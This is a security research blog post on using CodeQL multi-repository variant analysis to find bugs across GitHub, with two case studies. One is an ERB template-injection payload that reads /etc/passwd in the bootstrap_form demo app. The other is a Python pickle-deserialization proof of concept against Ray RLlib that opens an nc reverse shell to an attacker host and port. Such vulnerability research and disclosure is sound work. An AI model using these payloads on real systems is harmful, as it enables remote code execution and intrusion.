Finding Vulnerabilities with MRVA CodeQL

Finding Vulnerabilities with MRVA CodeQL

<- Not working

[*] INDEX:

  1. What is MRVA?
  2. MRVA vs CodeQL suites
  3. How to setup MRVA
  4. Code Search tools
  5. Fishing with MRVA 🎣

1- What is MRVA?

Is known by everyone the power of CodeQL, analyzing a repository with a single click, but with MRVA security researchers have a new way to perform security research across GitHub.

Using MRVA (multi-repository variant analysis), researchers can execute a query on the top 1000 Github repositories at once, significantly enhancing their ability to uncover potential security issues across a broader spectrum of projects.

This can be even more interesting by combining it with other tools such as Github Code Search to obtain a more specific list of repositories to analyze (e.g. if we’re running a Ruby SSTI query we’ll be only interested in those repositories that uses ERB or Slim) or use a query that we have developed, being the first to run that query so that the chances of finding something interesting are higher.

2- MRVA vs CodeQL suites

So what’s the difference between MRVA and CodeQL suites?

MRVA is a CodeQL feature that takes part in a large number of repositories. It would be more correct to ask when it is more convenient to use CodeQL in a single repository or to use MRVA in up to 1000. If the user is interested in finding vulnerabilities in a specific repository, CodeQL suites would be the ideal solution for his needs. The suites give us the possibility to run a list of queries with different vulnerabilities that will give us much more chances of finding something in the specific repository.

CodeQL

<- Not working

But if CodeQL suites gives us a better coverage of vulnerabilities, what’s the point of using MRVA? MRVA allows you to run a single query in many repositories, it allows you to find a type of vulnerability in many sites which CodeQL suites cannot. This can be interesting for those who are interested in developing custom queries, it would save a lot of time.

MRVA

<- Not working

3- How to set up MRVA

3.1 - Download CodeQL extension in VSCode

First of all we have to download the CodeQL extension for Visual Studio Code a version up to 1.8.0.

<- Not working

3.2 - Configure our Github controller

Now we go to our Github and create a repository named controller (although any name works) and remember to make at least one commit. The reason we’re doing this is because MRVA uses Github actions to run CodeQL queries against databases that are already created and stored on Github (imagine having to create a thousand databases for a thousand projects, it would take forever, GitHub already does the work for us 😎).

<- Not working

Once the controller is ready we have to edit our CodeQL extension settings.json:

<- Not working

Then add the following line for MRVA controller repository (replace your_username to your Github username):

"codeQL.variantAnalysis.controllerRepo": "your_username/controller",

<- Not working

Now we’re ready to run it 😎.

4- Code Search tools

<- Not working

We can use Github Code Search to find code snippets of interest. The interesting part here is creating a custom list of repositories that utilize the methods we are scanning. This approach goes beyond merely analyzing the top 1000 repositories and enables us to focus on specific projects that are relevant to our interests and research.

<- Not working

Luckily, Github API already supports Code Search (before it only supported code legacy), so we can take advantage of that and create a tool. In my case, this is the script I used, here is the repository:

import requests
import re
import urllib.parse
import argparse

token = ""
pattern = '(?<="full_name":")([^"]+)'

headers = {
    "Accept": "application/vnd.github+json",
    "Authorization": f"Bearer {token}",
    "X-GitHub-Api-Version": "2022-11-28"
}

def request_api(query):
    results = []
    i = 1
    while True:
        url = f"https://api.github.com/search/code?q={urllib.parse.quote(query)}&per_page=100&page={i}"
        r = requests.get(url, headers=headers)
        content = re.findall(pattern, r.text)
        results.extend(content)
        i+=1
        if len(content) != 100:
            break
    return [*set(results)]


def output(filename, content):
    with open(filename, "w") as f:
        f.write(str(content))

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-q','--query', help='Query', required=True)
    parser.add_argument('-f','--filename', help='filename', required=True)

    args = parser.parse_args()
    query = args.query
    filename = args.filename

    results = request_api(query)
    output(filename, results)

Remember to add your Github token to make it work. This tool creates a custom list including all those repositories that utilizes the code we specify in the query argument:

&lt;- Not working

Although Code Search feature is included in Visual Studio Code since June 23 (Github Blog). The configuration is very simple, we just have to go to the CodeQL extension, create a list (I called it test):

&lt;- Not working

We can even specify the language used:

&lt;- Not working

And finally we specify our query for Code Search, in my case I used maikypedia so all repositories in which the word maikypedia appears will be included in the list:

&lt;- Not working

&lt;- Not working

5- Fishing with MRVA 🎣

5.1- Server Side Template Injection (Ruby)

Let’s move to the fun part, I have written a query for Server Side Template Injection in Ruby covering ERB and Slim, let’s try luck with MRVA!

As any static analysis tool we have to take into account the number of false positives, which will depend on the quality of the query, in this case we have had 4 results from the top 1000 Github repositories. After discarding the false positives we are left with a repository: bootstrap-ruby/bootstrap_form.

&lt;- Not working

&lt;- Not working

Let’s set up the server and check if it is really vulnerable:

bootstrap_form/demo/bin ❯ sudo ./rails s 

Now we should have our rails application running on port 3000, but let’s check the code first:

  def fragment
    @erb = params[:erb]

    @erb.prepend '<div class="p-3 border">'
    @erb << "</div>"
    load_models
    render inline: @erb, layout: "application" # rubocop: disable Rails/RenderInline
  end

This fragment takes a parameter named erb from the params hash (HTTP GET parameter) and assigns its value to an instance variable @erb. Then some html is appended and prepended to the variable, then it’s finally rendered using render inline:, method that functions like ERB.new(@erb).result.

This function is called when a user visits /fragment we can see this specified in the file routes.rb:

Dummy::Application.routes.draw do
  get "fragment" => "bootstrap#fragment", as: :fragment
  resources :users

  root to: "bootstrap#form"
end

So let’s jump to the browser! We can use the following payload to read /etc/passwd and prove the SSTI (don’t forget url encode it):

<%= IO.popen('cat /etc/passwd').readlines()  %>

&lt;- Not working

Nice 😎. But unfortunately, as the file path says, this is a demo application with no real security implications, so even though it is “vulnerable” at the code level, it has no impact.

5.2- Unsafe Deserialization (Python)

I found this when I was modeling unsafe deserialization sinks for Python including pandas.read_pickle and others. To my surprise, at the time of running MRVA waiting for some result of my sinks I found this:

&lt;- Not working

&lt;- Not working

It was a result with a sink from the original query and seeing the code snippet it seemed that it could be a TP. The repository is ray-project/ray.

The vulnerability resides in RLlib’s PolicyServerInput class (/ray/python/ray/rllib/env/policy_server_input.py). Specifically, on line 266, the HTTP POST handler in use deserializes user data using pickle. Using pickle for deserializing data from untrusted sources can be dangerous, as it allows the execution of arbitrary code during the deserialization process.

def do_POST(self):
    content_len = int(self.headers.get("Content-Length"), 0)
    raw_body = self.rfile.read(content_len)
    parsed_input = pickle.loads(raw_body)

The vulnerable class is used in the examples like /ray/rllib/examples/serving/cartpole_server.py (l.101-115):

if __name__ == "__main__":
    args = parser.parse_args()
    ray.init()
    def _input(ioctx):
        if ioctx.worker_index > 0 or ioctx.worker.num_workers == 0:
            return PolicyServerInput(
            ioctx,
            SERVER_ADDRESS,
            args.port + ioctx.worker_index - (1 if ioctx.worker_index > 0 else 0),
)

Now it’s time for the PoC 😁. Run the example server:

python3 /ray/rllib/examples/serving/cartpole_server.py

And then, send the malicious data to the policy server port:

import requests
import pickle
import os
attacker = "localhost"
attacker_port = "4444"

class RCE:
    def __reduce__(self):
        cmd = (f'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {attacker} {attacker_port} > /tmp/f')
        return os.system, (cmd,)
# Serialize the malicious class
pickled = pickle.dumps(RCE())
# Define the URL to which you want to send the POST request
url = "http://localhost:9900/"
headers = {
    "Content-Type": "application/octet-stream",  # Indicate that we are sending binary data
}
# Send the POST request with the serialized data
requests.post(url, data=pickled, headers=headers)

And as a final step, we run the exploit:

python3 exploit.py

&lt;- Not working

Once again, we find ourselves at the gates. It has been demonstrated that MRVA has great potential for finding vulnerable code. This vulnerability was reported to ray project and they stated is that code that should only be exposed to trusted parties. Therefore, there hasn’t been a fix, but rather a comment to make the warning more explicit in this commit.

THANKS FOR READING 😊 !!